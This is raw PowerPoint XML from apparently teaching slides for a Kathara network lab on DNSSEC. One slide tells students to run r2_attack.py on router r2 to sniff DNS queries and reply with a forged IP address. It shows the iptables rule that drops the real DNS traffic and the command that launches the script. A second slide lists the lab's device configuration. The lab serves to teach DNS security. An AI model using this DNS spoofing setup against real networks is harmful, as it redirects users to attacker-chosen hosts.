            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1AB8260-6A9D-DB92-8C94-08B510258628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run Python script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5648EE39-F7AD-53CD-0778-538F87D04B7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run the r2_attack script to sniff the traffic and then send the packet with the fake IP address to the client who made the query.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CC7DB5-B74B-DEE6-4DBF-B680E26CD383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A59D58-AFB9-9A1D-A32B-C763EEA25C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F403AE21-718D-BDDA-35EF-4EDA7386659B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1832189" y="3464424"/>
            <a:ext cx="8527621" cy="2683937"/>
            <a:chOff x="4868024" y="2378845"/>
            <a:chExt cx="6736490" cy="2064838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EF2580D-0CDC-2D60-0531-DF232F1D845A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868025" y="2659116"/>
              <a:ext cx="6736489" cy="1784567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iptables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>python3 r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D18E0DE-331C-3E09-2A88-897AA5D43996}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868024" y="2378845"/>
              <a:ext cx="6712254" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B6A8EA-B4E3-B638-BB89-E9157544E36C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E4C829E-92EC-E662-7D66-B19735137FF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2F6C296-B8AF-8C68-94A3-7CBDE6568B22}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AD7FFE-D33A-7C29-363A-5D642E5BBD55}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32409340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38222C-EC04-6F60-0CBA-D5B48CAD2446}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA0A9538-7C78-E206-382A-6CCB897F843D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B831B4-EC8F-5540-F9C6-451BB8688017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74FDC1B7-D387-3BF3-0110-181991D91470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF196EA4-E0A0-8A9E-08FC-C9B982233A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22F35FF-3353-A1F4-C847-C384BAFE352E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>seed-server:apache-php</a:t>
              </a:r>
              <a:r>
